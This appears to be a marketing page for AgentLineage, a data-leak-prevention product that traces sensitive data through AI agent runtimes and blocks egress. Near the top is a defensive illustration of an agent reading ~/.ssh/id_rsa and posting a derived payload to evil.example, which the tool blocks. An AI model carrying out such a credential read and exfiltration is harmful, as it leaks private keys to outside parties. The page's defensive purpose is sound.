Provenance-aware DLP for AI agents

Stop AI agents from leaking secrets.

AgentLineage tracks where sensitive data comes from and blocks unsafe tool, code, subprocess, and network actions before egress.

agent reads ~/.ssh/id_rsa
secret -> TrackedStr
payload = transform(secret)

HTTP POST https://evil.example/upload

BLOCK SecretToNetwork
source: file:id_rsa
sink: urllib.request.urlopen
path: read -> replace -> lower -> encode -> send

Runtime dataflow enforcement

Data-leak prevention built for agent runtimes.

AgentLineage follows sensitive data through tools, generated code, and supported IO boundaries, then blocks unsafe egress before real-world effects happen.

01

Track sensitive data

Files, environment values, prompts, tool inputs, and generated-code inputs become provenance-aware values.

02

Preserve provenance

Transformations carry source history into derived strings, bytes, containers, and tool outputs.

03

Enforce before egress

HTTP, subprocess, tool, and code-execution boundaries check payload provenance before they run.

04

Explain every block

Reports show the source, transformation path, sink, policy, code hash, and event sequence.

Why AgentLineage

Guardrails say yes or no. AgentLineage shows the data path.

Agent security needs more than prompt filters and tool allowlists. AgentLineage makes security decisions from runtime provenance.

Runtime DLP

Stop secret exfiltration

Block secret-derived payloads before they cross supported network, tool, or subprocess boundaries.

Precision

Reduce noisy blocks

Allow safe actions when AgentLineage can prove the outgoing payload is not derived from sensitive data.

Audit

Explain source to sink

Give security teams structured evidence showing what was read, transformed, and blocked.

Integration

Fit existing agents

Wrap agent tools, generated-code execution, and egress paths without replacing the orchestration framework.

Private preview

Book an AgentLineage demo for your agent.

Show us an agent workflow that touches repositories, tickets, customer data, credentials, or cloud APIs. We will help evaluate where sensitive data can flow.

Emails are stored in Supabase with insert-only browser access.